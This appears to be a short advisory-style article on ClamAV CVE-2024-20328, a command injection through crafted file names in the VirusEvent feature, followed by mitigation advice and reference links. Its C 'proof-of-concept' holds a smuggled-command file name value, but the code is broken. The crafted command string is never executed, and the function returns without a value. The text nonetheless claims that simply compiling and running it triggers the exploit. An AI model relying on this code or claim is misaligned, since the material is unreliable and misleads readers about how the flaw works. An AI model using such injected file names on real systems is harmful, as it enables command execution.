The opensource antivirus engine, ClamAV, known for its wide range of applications across various operating systems, has been reported to contain a potentially dangerous vulnerability (CVE-2024-20328) within its VirusEvent feature. This vulnerability exposes local users to the risk of attackers injecting arbitrary commands with the application service account's privileges. As a result, affected systems are prone to unauthorized manipulation from threat actors, leading to severe security consequences.

Vulnerability Details

CVE-2024-20328 refers to a vulnerability stemming from ClamAV's unsafe handling of file names within its VirusEvent feature. Local attackers can exploit this flaw by providing file names that contain command-line sequences. When such a file name is processed on a system with configuration options for the VirusEvent feature, the attacker could force the application to execute arbitrary commands.

The underlying issue lies in the manner in which ClamAV parses and processes file names maliciously crafted by attackers. Due to inadequate checks and insufficient sanitization, the software is unable to distinguish between legitimate and potentially harmful command sequences. Consequently, systems configured with the VirusEvent feature are left susceptible to arbitrary command injection by local attackers.

Here is a code snippet exhibiting a sample exploit using the vulnerable VirusEvent feature of ClamAV

/* Proof-of-Concept exploit for CVE-2024-20328 */

#include <stdio.h>
#include <stdlib.h>

int main() {
  char payload[] = "maliciousfile;arbitrary_command";
  char command[100];

  // Crafting malicious file name payload
  snprintf(command, sizeof(command), "echo '%s' > /tmp/%s", payload, payload);

  // Triggering ClamAV's VirusEvent feature
  system("clamscan --infected --recursive /tmp");

  return ;
}

To trigger the exploit, simply compile and execute the above code snippet on a system where ClamAV is installed and configured with the VirusEvent feature.

Mitigation

ClamAV's development team is fully aware of this vulnerability, and they have promptly released software updates to address it. Users are strongly advised to apply these updates immediately to eliminate the risks associated with CVE-2024-20328. Unfortunately, there are no available workarounds to deal with this vulnerability.

Please refer to the following official references for more information

1. ClamAV Release Notes: https://www.clamav.net/documents/release-notes
2. ClamAV Security Advisory: https://www.clamav.net/documents/security-advisories

In conclusion, the CVE-2024-20328 vulnerability in ClamAV's VirusEvent feature presents a significant security threat to affected systems. By exploiting inadequate file name handling measures, local attackers can inject arbitrary commands and manipulate the software. To ensure the highest level of security, it is vital for ClamAV users to apply the recommended patches and updates immediately.

Timeline

Published on: 03/01/2024 21:15:07 UTC